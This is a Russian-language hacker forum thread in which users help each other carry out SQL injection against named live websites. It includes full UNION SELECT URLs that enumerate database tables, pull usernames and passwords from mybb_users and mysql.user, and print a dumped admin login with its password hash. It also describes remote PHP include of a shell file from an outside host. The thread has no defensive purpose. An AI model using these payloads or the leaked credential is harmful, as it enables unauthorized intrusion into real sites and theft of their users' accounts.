Чего-то я там не вижу php-include. Может прикрыли уже? Но как вариант было найти реальный путь, и инклюдить файлы, начиная с index'a и дойдя так до БД слогами, но надо, что бы там было читалка. Можно было провести удаленный php-include, т.е. file.php?a=http://site.ru/shell.txt. Желательно именно *.txt, потому что не всегда можно *.php заливать и не факт, что сработает, а так любой файл даже *.txt все-ровно принимается как *.php!

http://www.wowpourlesnuls.fr/images.php?img=-1%20union%20select%201,group_concat(table_name)%20 from%20information_schema.tables%20%20--

Помогите плиз, вобщем вывел таблицы через Group_concat но они не все выводяться, а лимит работает но как то странно допустим при 15,1 дает VIeus а через минуту при 15,1 выдает ошибку, так до конца и не могу добраться, подскажите кто нить в чем проблема...

Assembler,

А где написано, что они должны все выводиться?
Да, иногда ошибку даёт, не в лимите дело, он и без него иногда ничего не выводит. Но в любом случае вывести можно, там 346 таблиц, несколько раз делай запрос , до вывода, других способов всё равно нет

Зачем через group_concat? Делай просто через limit по одному.
http://www.rapidshare.ru/909903 - вот тебе список всех таблиц! Самые полезные: user и mybb_users
http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,column_name+from+information_sche ma.columns+where+table_name=0x75736572++-- это колонки таблицы user
http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,column_name+from+information_sche ma.columns+where+table_name=0x6d7962625f7573657273 ++-- колонки таблицы mybb_users
http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,concat_ws(0x3a,uid,username,passw ord)+from+mybb_users--
1:Admin:5d3fd0aa8e2c38d1b632a1a2d09f46dd - вот логин и пароль из таблицы mybb_users

https://forum.antichat.ru/showpost.php?p=1075672&postcount=4940

Есть еще знак > и < и т.д. Лимит не везде доступен при скулях

Pashkela Не понял. Ты отвечал на какой-то мой вопрос?
Если на этот --> А где написано, что они должны все выводиться?
То ответа по ссылке на нашол, да и не стоит беспокоится, вопрос риторический
Насчёт лимита:
Там работает лимит, просто скрипт глючит иногда.

как это у вас проходят конструкции group_concat+limit, я думал функции с аргументами выборки не дружат с лимитом,
на вашем же примере если задавать начальные позиции <>0
вот ещё 1 пример, вывод есть:
вывода нет
и чем вас не устраивает вариант group_concat(user order by 'user') where user>'user' ? '(

Какой ещё group_concat+limit? Лично я говорил про лимит отдельно, груп конкат отдельно. Возможно не достаточно понятно выразился, извиняйте.
Я тебе уже говорил, что подзапросы и условия-- это не наш метод, нам нужна кнопка "Залить шелл"

===========================
add: кстати о проститутках, их можно группировать Например так(разбиваем по базам):

http://mskputana.ru/list.php?foto=p44512_3.jpg&link=-1+union+select+group_concat(table_name),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43+from+information_schema.tables+group+by+ta ble_schema+limit+2,1--+

При таком раскладе лимит ,разумеется, работает отлично

Ну а не на information_schema, тоже можно групировать по полю, админов там всех вывести и т.д
Типо:
-1+union+select+group_concat(concat_ws(0x2f,user,pa ssword,file_priv)),2,3,4,5,6+from+mysql.user+group +by+file_priv+limit+1,1

Ну и т.д., тоже конечно не панацея, но как вариант покатит